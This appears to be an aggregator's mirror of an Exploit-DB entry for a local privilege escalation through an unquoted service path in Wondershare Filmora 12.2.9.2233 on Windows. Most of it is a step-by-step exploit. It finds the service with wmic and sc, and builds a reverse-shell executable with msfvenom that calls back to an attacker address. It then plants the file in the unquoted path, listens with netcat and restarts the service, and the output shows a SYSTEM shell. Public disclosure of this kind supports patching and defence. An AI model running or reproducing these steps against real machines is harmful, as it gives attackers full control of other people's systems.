6

[local] Wondershare Filmora 12.2.9.2233 - Unquoted Service Path

 1 year ago
source link: https://www.exploit-db.com/exploits/51395
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Wondershare Filmora 12.2.9.2233 - Unquoted Service Path

EDB-ID:

51395

EDB Verified:

Author:

msd0pe

Type:

local

Exploit:

  /  

Platform:

Windows

Date:

2023-04-25

Vulnerable App:

############################################################################
#                                                                          #
#  Exploit Title: Wondershare Filmora 12.2.9.2233 - Unquoted Service Path  #
#  Date: 2023/04/23                                                        #
#  Exploit Author: msd0pe                                                  #
#  Vendor Homepage: https://www.wondershare.com                            #
#  My Github: https://github.com/msd0pe-1                                  # 
#                                                                          # 
############################################################################

Wondershare Filmora:
Versions =< 12.2.9.2233 contains an unquoted service path which allows attackers to escalate privileges to the system level.

[1] Find the unquoted service path:
    > wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """

Wondershare Native Push Service   NativePushService   C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe   Auto

[2] Get informations about the service:
    > sc qc "NativePushService"

    [SC] QueryServiceConfig SUCCESS

    SERVICE_NAME: NativePushService
            TYPE               : 10  WIN32_OWN_PROCESS
            START_TYPE         : 2   AUTO_START
            ERROR_CONTROL      : 1   NORMAL
            BINARY_PATH_NAME   : C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare NativePush\WsNativePushService.exe
            LOAD_ORDER_GROUP   :
            TAG                : 0
            DISPLAY_NAME       : Wondershare Native Push Service
            DEPENDENCIES       :
            SERVICE_START_NAME : LocalSystem


[3] Generate a reverse shell:
    > msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o Wondershare.exe

[4] Upload the reverse shell to C:\Users\msd0pe\AppData\Local\Wondershare\Wondershare.exe
    > put Wondershare.exe
    > ls
    drw-rw-rw-          0  Sun Apr 23 14:51:47 2023 .
    drw-rw-rw-          0  Sun Apr 23 14:51:47 2023 ..
    drw-rw-rw-          0  Sun Apr 23 14:36:26 2023 Wondershare Filmora Update
    drw-rw-rw-          0  Sun Apr 23 14:37:13 2023 Wondershare NativePush
    -rw-rw-rw-       7168  Sun Apr 23 14:51:47 2023 Wondershare.exe
    drw-rw-rw-          0  Sun Apr 23 13:52:30 2023 WSHelper


[5] Start listener
    > nc -lvp 4444

[6] Reboot the service/server
    > sc stop "NativePushService"
    > sc start "NativePushService"

    OR

    > shutdown /r

[7] Enjoy !
    192.168.1.102: inverse host lookup failed: Unknown host
    connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
    Microsoft Windows [Version 10.0.19045.2130]
    (c) Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami

    nt authority\system

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK